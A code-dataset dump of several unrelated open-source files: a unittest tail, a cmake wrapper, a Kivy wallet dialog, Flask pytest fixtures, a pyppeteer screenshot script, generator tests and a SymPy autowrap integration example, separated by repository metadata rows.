                    "subnet": "10.0.0.0/24"
                },
                "tenant": {
                    "interface": "eth1",
                    "ip": "172.16.1.3",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                }
            }],
            "os_network": [{
                "hostname": "server03",
                "management": {
                    "interface": "eth0",
                    "ip": "12.234.32.103",
                    "netmask": "255.255.255.0",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "subnet": "12.234.32.0/24"
                },
                "tenant": {
                    "interface": "eth1",
                    "ip": "172.16.1.3",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                },
                "public": {
                    "interface": "eth2",
                    "ip": "10.0.0.1",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": True,
                    "subnet": "10.0.0.0/24"
                }
            }]
        }
        self.maxDiff = None
        output = self.test_config_manager.get_cluster_roles_mapping()
        self.assertEqual(expected_output, output)

    def test_get_all_hosts_roles(self):
        """Returns the distinct set of roles across all hosts (order-free)."""
        expected_output = ['os-compute-worker', 'os-network', 'os-controller']
        output = self.test_config_manager.get_all_hosts_roles()
        self.assertEqual(len(expected_output), len(output))
        self.assertEqual(sorted(expected_output), sorted(output))

    def test_get_host_role_mapping(self):
        """Role mapping for a single host (id 3 carries two roles)."""
        expected_output = {
            "os_network": {
                "hostname": "server03",
                "management": {
                    "interface": "eth0",
                    "ip": "12.234.32.103",
                    "netmask": "255.255.255.0",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "subnet": "12.234.32.0/24"
                },
                "tenant": {
                    "interface": "eth1",
                    "ip": "172.16.1.3",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                },
                "public": {
                    "interface": "eth2",
                    "ip": "10.0.0.1",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": True,
                    "subnet": "10.0.0.0/24"
                }
            },
            "os_compute_worker": {
                "hostname": "server03",
                "management": {
                    "interface": "eth0",
                    "ip": "12.234.32.103",
                    "netmask": "255.255.255.0",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "subnet": "12.234.32.0/24"
                },
                "tenant": {
                    "interface": "eth1",
                    "ip": "172.16.1.3",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                },
                "public": {
                    "interface": "eth2",
                    "ip": "10.0.0.1",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": True,
                    "subnet": "10.0.0.0/24"
                }
            }
        }
        self.maxDiff = None
        output = self.test_config_manager.get_host_roles_mapping(3)
        self.assertEqual(expected_output, output)
if __name__ == '__main__':
    # Initialize flag parsing and logging before handing off to unittest2.
    flags.init()
    logsetting.init()
    unittest2.main()
| 36.264957 | 78 | 0.448268 |
acfa5ff89c420aef98eb4e4653a08fb6b5021501 | 4,256 | py | Python | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | """wrapper for cmake tool"""
import subprocess
from subprocess import PIPE
import platform
from mod import log,util
from mod.tools import ninja
# Tool metadata consumed by the surrounding project: tool name, supported
# host platforms, whether the tool is optional, and the hint shown when the
# tool cannot be found.
name = 'cmake'
platforms = ['linux', 'osx', 'win']
optional = False
not_found = 'please install cmake 2.8 or newer'
#------------------------------------------------------------------------------
def check_exists(fips_dir, major=2, minor=8):
    """test if cmake is in the path and has the required version

    :param fips_dir: absolute path to the fips directory (unused here; part
                     of the common tool-module interface)
    :param major:    minimum required major version (default: 2)
    :param minor:    minimum required minor version (default: 8)
    :returns: True if cmake was found and is at least version major.minor
    """
    try:
        out = subprocess.check_output(['cmake', '--version']).decode("utf-8")
        # Expected output starts with "cmake version X.Y.Z[-suffix]".
        ver = out.split()[2].split('.')
        found_major = int(ver[0])
        found_minor = int(ver[1])
    except (OSError, subprocess.CalledProcessError, IndexError, ValueError):
        # cmake is missing, returned an error, or printed a version string we
        # cannot parse. Previously an odd version string (e.g. only "X.Y")
        # crashed with an uncaught IndexError/ValueError instead of
        # reporting "not found".
        return False
    if found_major > major or (found_major == major and found_minor >= minor):
        return True
    patch = ver[2] if len(ver) > 2 else '0'
    log.info('{}NOTE{}: cmake must be at least version {}.{} (found: {}.{}.{})'.format(
        log.RED, log.DEF, major, minor, found_major, found_minor, patch))
    return False
#------------------------------------------------------------------------------
def run_gen(cfg, fips_dir, project_dir, build_dir, toolchain_path, defines) :
    """run cmake tool to generate build files

    :param cfg: a fips config object (dict with 'generator', 'build_type',
        'build_tool', 'name', 'defines', ... keys)
    :param fips_dir: absolute path of the fips directory (used to locate
        the bundled ninja tool on Windows)
    :param project_dir: absolute path to project (must have root CMakeLists.txt file)
    :param build_dir: absolute path to build directory (where cmake files are generated)
    :param toolchain_path: toolchain file path or None
    :param defines: dict of additional cmake defines passed on the command line
    :returns: True if cmake returned successful
    """
    cmdLine = 'cmake'
    # 'Default' means: let cmake pick its platform-default generator
    if cfg['generator'] != 'Default' :
        cmdLine += ' -G "{}"'.format(cfg['generator'])
    if cfg['generator-platform'] :
        cmdLine += ' -A "{}"'.format(cfg['generator-platform'])
    if cfg['generator-toolset'] :
        cmdLine += ' -T "{}"'.format(cfg['generator-toolset'])
    cmdLine += ' -DCMAKE_BUILD_TYPE={}'.format(cfg['build_type'])
    # on Windows, point cmake at the ninja executable shipped with fips
    if cfg['build_tool'] == 'ninja' and platform.system() == 'Windows':
        cmdLine += ' -DCMAKE_MAKE_PROGRAM={}'.format(ninja.get_ninja_tool(fips_dir))
    if toolchain_path is not None :
        cmdLine += ' -DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain_path)
    cmdLine += ' -DFIPS_CONFIG={}'.format(cfg['name'])
    # config-level defines: bools become ON/OFF, everything else is quoted
    if cfg['defines'] is not None :
        for key in cfg['defines'] :
            val = cfg['defines'][key]
            if type(val) is bool :
                cmdLine += ' -D{}={}'.format(key, 'ON' if val else 'OFF')
            else :
                cmdLine += ' -D{}="{}"'.format(key, val)
    # extra defines passed by the caller (unquoted, override nothing)
    for key in defines :
        cmdLine += ' -D{}={}'.format(key, defines[key])
    # -B/-H: build dir and source ("home") dir
    cmdLine += ' -B' + build_dir
    cmdLine += ' -H' + project_dir
    print(cmdLine)
    res = subprocess.call(cmdLine, cwd=build_dir, shell=True)
    return res == 0
#------------------------------------------------------------------------------
def run_build(fips_dir, target, build_type, build_dir, num_jobs=1):
    """Invoke cmake in build mode.

    :param fips_dir: absolute path of the fips directory (unused here)
    :param target: build target, can be None (builds all)
    :param build_type: CMAKE_BUILD_TYPE string (e.g. Release, Debug)
    :param build_dir: path to the build directory
    :param num_jobs: number of parallel jobs (default: 1)
    :returns: True if cmake returns successful
    """
    parts = ['cmake --build . --config {}'.format(build_type)]
    if target:
        parts.append('--target {}'.format(target))
    # pass the parallelism flag through to the native build tool
    if platform.system() == 'Windows':
        parts.append('-- /nologo /verbosity:minimal /maxcpucount:{}'.format(num_jobs))
    else:
        parts.append('-- -j{}'.format(num_jobs))
    cmd = ' '.join(parts)
    print(cmd)
    return subprocess.call(cmd, cwd=build_dir, shell=True) == 0
#------------------------------------------------------------------------------
def run_clean(fips_dir, build_dir):
    """Invoke cmake to clean the build directory.

    :param fips_dir: absolute path of the fips directory (unused here)
    :param build_dir: path to the build directory
    :returns: True if cmake returns successful
    """
    try:
        exit_code = subprocess.call('cmake --build . --target clean',
                                    cwd=build_dir, shell=True)
    except (OSError, subprocess.CalledProcessError):
        return False
    return exit_code == 0
| 40.923077 | 95 | 0.555686 |
acfa61b0f37151aefa904a1ba28a7bdd93ea8867 | 78 | py | Python | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | from cqh_file_watcher.run import main
if __name__ == "__main__":
main()
| 13 | 37 | 0.705128 |
acfa62ae8efe16c6c552b67ad693ad2676bedc8a | 2,108 | py | Python | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrum | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | 1 | 2019-06-26T16:51:43.000Z | 2019-06-26T16:51:43.000Z | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrumsys | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | null | null | null | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrumsys | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | 1 | 2018-09-10T21:43:02.000Z | 2018-09-10T21:43:02.000Z | import os
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from electrumsys.util import base_units
from electrumsys.storage import StorageReadWriteError
from ...i18n import _
from .label_dialog import LabelDialog
Builder.load_string('''
<WalletDialog@Popup>:
title: _('Wallets')
id: popup
path: ''
disable_new: True
BoxLayout:
orientation: 'vertical'
padding: '10dp'
FileChooserIconView:
id: wallet_selector
dirselect: False
filter_dirs: True
filter: '*.*'
path: root.path
rootpath: root.path
size_hint_y: 0.6
Widget
size_hint_y: 0.1
GridLayout:
cols: 3
size_hint_y: 0.1
Button:
id: new_button
disabled: root.disable_new
size_hint: 0.1, None
height: '48dp'
text: _('New')
on_release:
popup.dismiss()
root.new_wallet(wallet_selector.path)
Button:
id: open_button
size_hint: 0.1, None
height: '48dp'
text: _('Open')
disabled: not wallet_selector.selection
on_release:
popup.dismiss()
root.callback(wallet_selector.selection[0])
''')
class WalletDialog(Factory.Popup):
    """Wallet-picker popup; its widget tree (file chooser plus New/Open
    buttons) is declared in the kv string loaded at module import time."""

    def __init__(self, path, callback, disable_new):
        # path: directory listed by the file chooser (also used as rootpath)
        # callback: invoked with the full path of the chosen/created wallet
        # disable_new: when True the "New" button is greyed out in the kv rule
        Factory.Popup.__init__(self)
        self.path = path
        self.callback = callback
        self.disable_new = disable_new
    def new_wallet(self, dirname):
        """Prompt for a wallet name and report the new wallet's full path."""
        assert self.disable_new is False
        def cb(filename):
            if not filename:
                return
            # FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
            self.callback(os.path.join(dirname, filename))
        d = LabelDialog(_('Enter wallet name'), '', cb)
        d.open()
| 28.876712 | 103 | 0.555977 |
acfa6330ff76bbe00adf1ef3baff1c24a00e4f4e | 7,855 | py | Python | tests/conftest.py | brayest/testcode | 865d31ccfaf75946620c36955cc3dcb395515796 | [
"Unlicense"
] | 652 | 2021-01-24T10:32:08.000Z | 2022-02-05T09:14:10.000Z | tests/conftest.py | starhappy/Dryvo | 14c549a4f2265afd515bfd6f5f477a68187ea287 | [
"Unlicense"
] | 1 | 2021-01-27T05:09:14.000Z | 2021-02-01T06:21:05.000Z | tests/conftest.py | starhappy/Dryvo | 14c549a4f2265afd515bfd6f5f477a68187ea287 | [
"Unlicense"
] | 147 | 2021-01-25T10:57:22.000Z | 2022-02-05T09:14:12.000Z | import json
import random
import string
import tempfile
from datetime import datetime, timedelta
from pathlib import Path
import flask
import flask.testing
import pytest
import responses as responses_module
from server import create_app
from server.api.database import close_db, db, reset_db
from server.api.database.models import (
Appointment,
Place,
PlaceType,
Student,
Teacher,
Topic,
User,
WorkDay,
Car,
)
from server.api.social import SocialNetwork, social_networks_classes
DEMO_API_KEY = "ccbd100c5bcd1b3d31aaa33851917ca45a251d41988d6c6a3a9e0c68b13d47c2"
@pytest.fixture
def app() -> flask.Flask:
    """Yield an application instance configured for tests: dummy secrets,
    a throwaway sqlite database file, and a pre-populated schema."""
    # firebase credentials are read from a checked-in test service account
    with open(Path.cwd() / "tests" / "service-account.json", "r") as f:
        firebase_json = f.read()
    # NamedTemporaryFile gives us a db file that is deleted on teardown
    with tempfile.NamedTemporaryFile() as db_f:
        # create the app with common test config
        app = create_app(
            TESTING=True,
            SECRET_KEY="VERY_SECRET",
            SQLALCHEMY_DATABASE_URI=f"sqlite:///{db_f.name}",
            FIREBASE_JSON=firebase_json,
            SECRET_JWT="VERY_VERY_SECRET",
            FLASK_DEBUG=1,
            FACEBOOK_TOKEN="test",
            FACEBOOK_CLIENT_SECRET="test",
            FACEBOOK_CLIENT_ID="test",
        )
        with app.app_context():
            db.init_app(app)
            reset_db(db)
            setup_db(app)
            # hand the app to the test; cleanup runs after the test returns
            yield app
            close_db()
def setup_db(app):
    """Populate the test database with a fixed cast: a plain user, an admin,
    one approved teacher (with a car and a work day), one approved student
    (with meetup/dropoff places), a topic, and one appointment 5 days out."""
    # plain user with no role
    User.create(
        email="t@test.com", password="test", name="test", area="test", phone="044444444"
    )
    # admin user
    User.create(
        email="admin@test.com",
        password="test",
        name="admin",
        area="test",
        is_admin=True,
        phone="055555555",
    )
    # approved teacher with invoice API key and a car
    teacher_user = User.create(
        email="teacher@test.com", password="test", name="teacher", area="test"
    )
    teacher = Teacher.create(
        user=teacher_user,
        price=100,
        lesson_duration=40,
        is_approved=True,
        crn=999999999,
        invoice_api_key=DEMO_API_KEY,
    )
    Car.create(teacher=teacher, number=1111111111)
    # approved student assigned to that teacher
    student_user = User.create(
        email="student@test.com", password="test", name="student", area="test"
    )
    student = Student.create(
        user=student_user, teacher=teacher, creator=teacher.user, is_approved=True
    )
    # default meetup/dropoff places for the student
    meetup = Place.create(
        description="test",
        used_as=PlaceType.meetup.value,
        student=student,
        google_id="ID1",
    )
    dropoff = Place.create(
        description="test",
        used_as=PlaceType.dropoff.value,
        student=student,
        google_id="ID2",
    )
    WorkDay.create(
        teacher=teacher,
        day=1,
        from_hour=0,
        to_hour=23,
        to_minutes=59,
        on_date=(datetime.utcnow() + timedelta(days=2)).date(),
    )  # 2 days from now
    Topic.create(title="topic test", min_lesson_number=1, max_lesson_number=5)
    Appointment.create(
        teacher=teacher,
        student=student,
        # schedule to 5 days from now to it won't bother with no test
        creator=teacher.user,
        duration=40,
        date=(datetime.utcnow() + timedelta(days=5)),
        meetup_place=meetup,
        dropoff_place=dropoff,
    )
@pytest.fixture
def db_instance(app):
    # the SQLAlchemy db object, bound to an active app context
    with app.app_context():
        yield db
@pytest.fixture
def user(app):
    # the plain (non-admin) user created by setup_db()
    with app.app_context():
        yield User.query.filter_by(email="t@test.com").one()
@pytest.fixture
def admin(app):
    # the admin user created by setup_db()
    with app.app_context():
        yield User.query.filter_by(email="admin@test.com").one()
class Requester:
    """Wrap a werkzeug-style test client with sticky request headers.

    The Authorization header (and anything merged in via ``headers=``)
    persists across calls, so an authenticated session can be simulated.
    """

    def __init__(self, client):
        self._client = client
        self.headers = {"Authorization": ""}

    def request(self, method, url, **kwargs):
        # Per-call headers are merged into (and kept on) the instance
        # before being sent, overriding any previously stored values.
        if "headers" in kwargs:
            self.headers.update(kwargs.pop("headers"))
        return self._client.open(url, method=method, headers=self.headers, **kwargs)

    def get(self, url, **kwargs):
        return self.request("GET", url, **kwargs)

    def post(self, url, **kwargs):
        return self.request("POST", url, **kwargs)

    def put(self, url, **kwargs):
        return self.request("PUT", url, **kwargs)

    def delete(self, url, **kwargs):
        return self.request("DELETE", url, **kwargs)
class AuthActions(object):
    """Drive the login/register/logout endpoints and keep the session's
    auth/refresh tokens on the wrapped Requester instance."""

    def __init__(self, client):
        # client is a Requester (has .headers, .request(), .post())
        self._client = client
        self.refresh_token = ""
        self.auth_token = ""
    def login(self, email="t@test.com", password="test"):
        return self.start_auth_session(
            "POST", "/login/direct", json={"email": email, "password": password}
        )
    def register(
        self,
        email="test@test.com",
        password="test",
        name="test",
        area="test",
        phone="0511111111",
    ):
        return self.start_auth_session(
            "POST",
            "/login/register",
            data={
                "email": email,
                "password": password,
                "name": name,
                "area": area,
                "phone": phone,
            },
        )
    def logout(self, **kwargs):
        logout = self._client.post(
            "/login/logout", json={"refresh_token": self.refresh_token}, **kwargs
        )
        # drop the auth header so later requests are unauthenticated
        self._client.headers["Authorization"] = ""
        return logout
    def start_auth_session(self, method, endpoint, **kwargs):
        """Send the request and remember the returned tokens; if an auth
        token was issued, install it as the client's Authorization header
        so subsequent requests from this instance are authenticated."""
        req = self._client.request(method, endpoint, **kwargs)
        self.auth_token = req.json.get("auth_token")
        self.refresh_token = req.json.get("refresh_token")
        if self.auth_token:
            self._client.headers["Authorization"] = "Bearer " + self.auth_token
        return req
class TestClient(flask.testing.FlaskClient):
    """Fix for SQLAlchemy sessions
    https://stackoverflow.com/questions/51016103/unable-to-retrieve-database-objects-in-flask-test-case-session"""
    def open(self, *args, **kwargs):
        # mirror the requests-style `json=` kwarg: serialize it into the
        # request body and set the JSON content type
        if "json" in kwargs:
            kwargs["data"] = json.dumps(kwargs.pop("json"))
            kwargs["content_type"] = "application/json"
        return super(TestClient, self).open(*args, **kwargs)
@pytest.fixture
def client(app):
    # use the JSON-aware TestClient subclass for all test requests
    app.test_client_class = TestClient
    return app.test_client()
@pytest.fixture
def requester(client):
    # header-preserving wrapper around the raw test client
    return Requester(client)
@pytest.fixture
def auth(requester):
    # login/register/logout helper bound to the shared requester
    return AuthActions(requester)
@pytest.fixture
def teacher(app):
    # the single teacher created by setup_db()
    with app.app_context():
        yield Teacher.query.first()
@pytest.fixture
def student(app):
    # the single student created by setup_db()
    with app.app_context():
        yield Student.query.first()
@pytest.fixture
def meetup(app, student):
    # the student's default meetup place (google_id "ID1" in setup_db)
    with app.app_context():
        yield (
            Place.query.filter_by(student=student)
            .filter_by(used_as=PlaceType.meetup.value)
            .first()
        )
@pytest.fixture
def dropoff(app, student):
    # the student's default dropoff place (google_id "ID2" in setup_db)
    with app.app_context():
        yield (
            Place.query.filter_by(student=student)
            .filter_by(used_as=PlaceType.dropoff.value)
            .first()
        )
@pytest.fixture
def topic(app):
    # the single topic created by setup_db()
    with app.app_context():
        yield Topic.query.first()
@pytest.fixture
def lesson(app):
    # the single appointment created by setup_db() (5 days in the future)
    with app.app_context():
        yield Appointment.query.first()
@pytest.fixture
def car(app):
    # the teacher's car created by setup_db()
    with app.app_context():
        yield Car.query.first()
@pytest.fixture
def fake_token():
    # 32 pseudo-random alphanumeric chars; a stand-in token for tests only,
    # so plain `random` (not `secrets`) is fine here
    return "".join(
        [random.choice(string.ascii_letters + string.digits) for n in range(32)]
    )
@pytest.fixture
def responses():
    # intercept outgoing HTTP calls made via `requests` for the test's duration
    with responses_module.RequestsMock() as rsps:
        yield rsps
@pytest.fixture(params=social_networks_classes)
def social_network(request) -> SocialNetwork:
    # parametrized: the dependent test runs once per social network class
    return request.param
| 25.838816 | 114 | 0.615786 |
acfa6416c7149314d5f5462c5878d2a7f0045771 | 299 | py | Python | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | '''cont = 1
while cont <= 10:
print(cont,'-> ',end='')
cont += 1
print('Acabou')'''
'''n = 0
while n != 999:
n = int(input('Digite um numero:'))'''
'''n = s = 0
while True:
n = int(input('Digite um numero:'))
if n == 999:
break
s += n
print(f'A soma vale {s}')'''
| 15.736842 | 42 | 0.474916 |
acfa6420f926103a9caee4630e1552df40ef3567 | 322 | py | Python | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | import asyncio
from pyppeteer import launch
async def main():
    """Launch a headless browser, screenshot github.com, then close it."""
    # --no-sandbox is required when running as root (e.g. inside Docker)
    browser = await launch(args=['--no-sandbox'])
    page = await browser.newPage()
    await page.goto('https://github.com/')
    await page.screenshot({'path': 'example.png'})
    await browser.close()
asyncio.get_event_loop().run_until_complete(main()) | 24.769231 | 51 | 0.695652 |
acfa64465470ff1c9548eec1acffea2a609de622 | 4,826 | py | Python | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | 2 | 2020-05-21T14:24:16.000Z | 2020-12-03T19:56:34.000Z | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | """Tests for generator_script.py
Currently just testing ``fetch_and_update_spec()``
with the 5 different calling combinations of parameters, plus the error case.
"""
from unittest.mock import patch
import pytest
from gen.generator_script import fetch_and_update_spec
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_1_spec_from_api(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """url only: spec is fetched from the API, applied, version recorded."""
    get_spec_from_api.return_value = ({"host": "apteco.com"}, "1.2.3.4567")
    version = fetch_and_update_spec(url="https://example1.com/OrbitAPI")
    assert version == "1.2.3.4567"
    get_spec_from_api.assert_called_once_with("https://example1.com/OrbitAPI")
    get_spec_from_file.assert_not_called()
    update_spec.assert_called_once_with({"host": "apteco.com"})
    update_orbit_spec_version_number.assert_called_once_with("1.2.3.4567")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_2_spec_from_file(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """filepath only: spec is read from file, version taken from the file."""
    get_spec_from_file.return_value = ({"host": "localhost"}, "1.3.5.79ac")
    version = fetch_and_update_spec(filepath="assets/api_specs/OrbitAPI-spec-1.3.5.79ac.json")
    assert version == "1.3.5.79ac"
    get_spec_from_api.assert_not_called()
    get_spec_from_file.assert_called_once_with("assets/api_specs/OrbitAPI-spec-1.3.5.79ac.json", None)
    update_spec.assert_called_once_with({"host": "localhost"})
    update_orbit_spec_version_number.assert_called_once_with("1.3.5.79ac")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_3_spec_from_file_supply_version(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """filepath + explicit version: the supplied version is passed through."""
    get_spec_from_file.return_value = ({"host": "127.0.0.1"}, "8.6.4.20")
    version = fetch_and_update_spec(filepath="data/api_specs/OrbitAPI-spec-latest.json", version="8.6.4.20")
    assert version == "8.6.4.20"
    get_spec_from_api.assert_not_called()
    get_spec_from_file.assert_called_once_with("data/api_specs/OrbitAPI-spec-latest.json", "8.6.4.20")
    update_spec.assert_called_once_with({"host": "127.0.0.1"})
    update_orbit_spec_version_number.assert_called_once_with("8.6.4.20")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_4_version_only(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """version only: no spec is fetched or applied, just version recorded."""
    version = fetch_and_update_spec(version="my manual version")
    assert version == "my manual version"
    get_spec_from_api.assert_not_called()
    get_spec_from_file.assert_not_called()
    update_spec.assert_not_called()
    update_orbit_spec_version_number.assert_called_once_with("my manual version")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_5_no_update(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """no arguments: nothing happens and None is returned."""
    version = fetch_and_update_spec()
    assert version is None
    get_spec_from_api.assert_not_called()
    get_spec_from_file.assert_not_called()
    update_spec.assert_not_called()
    update_orbit_spec_version_number.assert_not_called()
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_error_both_url_and_filepath(
    get_spec_from_api,
    get_spec_from_file,
    update_spec,
    update_orbit_spec_version_number,
):
    """url and filepath together: raises ValueError, nothing is touched."""
    with pytest.raises(ValueError) as exc_info:
        version = fetch_and_update_spec(
            url="https://example1.com/OrbitAPI",
            filepath="data/api_specs/OrbitAPI-spec-latest.json",
        )
    exception_msg = exc_info.value.args[0]
    assert exception_msg == "Can only specify one of url or filepath"
    get_spec_from_api.assert_not_called()
    get_spec_from_file.assert_not_called()
    update_spec.assert_not_called()
    update_orbit_spec_version_number.assert_not_called()
| 35.226277 | 108 | 0.77932 |
acfa649f81be9d52d437cb5551be5401ce059097 | 88 | py | Python | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | 2 | 2015-07-18T21:43:23.000Z | 2019-10-28T01:00:00.000Z | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | null | null | null | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | null | null | null | from unitsTest import *
import unittest
if __name__ == '__main__':
unittest.main()
| 14.666667 | 26 | 0.715909 |
acfa64ccf3f46108e651cbb4d59ff635c47af9bf | 9,076 | py | Python | examples/advanced/autowrap_integrators.py | benjaminmcdonald/sympy | dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e | [
"BSD-3-Clause"
] | 1 | 2016-07-13T04:30:25.000Z | 2016-07-13T04:30:25.000Z | examples/advanced/autowrap_integrators.py | jegerjensen/sympy | 3a43310f1957a21a6f095fe2801cc05b5268a2c7 | [
"BSD-3-Clause"
] | null | null | null | examples/advanced/autowrap_integrators.py | jegerjensen/sympy | 3a43310f1957a21a6f095fe2801cc05b5268a2c7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in Sympy to
create fast, numerical integration routines callable from python. See in the
code for detailed explanations of the various steps. An autowrapped sympy
expression can be significantly faster than what you would get by applying a
sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For the
sake of demonstration, this will be done by setting up a simple numerical
integration scheme as a Sympy expression, and obtain a binary implementation
with autowrap.
You need to have numpy installed to run this example, as well as a working
fortran compiler. If you have pylab installed, you will be rewarded with a
nice plot in the end.
[0]: http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
try:
import numpy as np
except ImportError:
sys.exit("Cannot import numpy. Exiting.")
try:
import pylab
except ImportError:
pylab = None
print "Couldn't import pylab"
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print __doc__
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print "Compiling ufuncs for radial harmonic oscillator solutions"
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print "The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n)
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
